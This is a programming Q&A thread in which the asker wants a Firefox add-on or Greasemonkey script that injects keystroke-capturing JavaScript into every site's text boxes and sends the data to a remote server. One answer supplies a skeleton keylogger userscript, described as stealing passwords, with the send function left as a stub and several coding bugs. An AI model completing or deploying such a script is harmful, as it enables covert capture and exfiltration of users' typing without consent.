# Firefox plugin or greasemonkey script to insert javascript

Tags: javascript, firefox-addon, greasemonkey

I am developing an app that analyzes the typing pattern of a user. To accomplish this, I need to change the HTML of the web page that the user is on (e.g. yahoo.com) - for all the text box items in the page, add a few JavaScript functions to capture the key down and key up events. So, I need to be able to add a new JavaScript to this existing page. The functions will package the data and send it to a remote server (e.g. myApp.com).

I need help with:

1. Inserting JavaScript to a HTML page
2. Add some functions that are defined in the JavaScript that was added above to all the `textarea` elements in the web page
3. A method to transfer data from the JavaScript above to a remote server (i.e. not to the server that serves the original page)

Firefox plug-in is preferable but Greasemonkey script is also OK...

Thanks!

Comment: why do you need a key logger?

Comment: What have you tried? Have you started building anything yet? What specific issues are you running into?

Comment: The javascript that that analyzes key presses and packages data is ready. I have a test page that has a text box and allows user input to be captured. I now need to integrate with other web pages and needed help to get me started.

Comment: My app is related to interpreting the user's typing pattern - so I need the key logger.

Comment: No offence but If you aren't capable of working out what greasemonkey does, you aren't capable of writing the JS to do this.

Answer (score 0):

If you don't mind it running only on firefox then I'd recommend [Mozilla Jetpack](https://jetpack.mozillalabs.com/tutorial.html).

If you're happy working with [jQuery](http://api.jquery.com) it's a very familiar environment.

Answer (score 0):

This is the code you need to get the keyup and keydown events.

```
// ==UserScript==
// @name          Log-O-Matic
// @description   A keylogger to steal your password and money ^^
// @include       http*://*
// ==/UserScript==

var collected_data="";
function collect(event){ collected_data+="/"+event.keyCode;}
function send_home(){ /* use GM_xmlhttprequest here to send collected_data */}
var textareas = document.getElementsByTagName("textarea");
for(i in textareas) {
    textareas[i].onKeyPress=collect;
}
var inputs = document.getElementsByTagName("input");
for(i in input) {
    if(input[i].type!="password")input[i].onKeyPress=collect;
}
```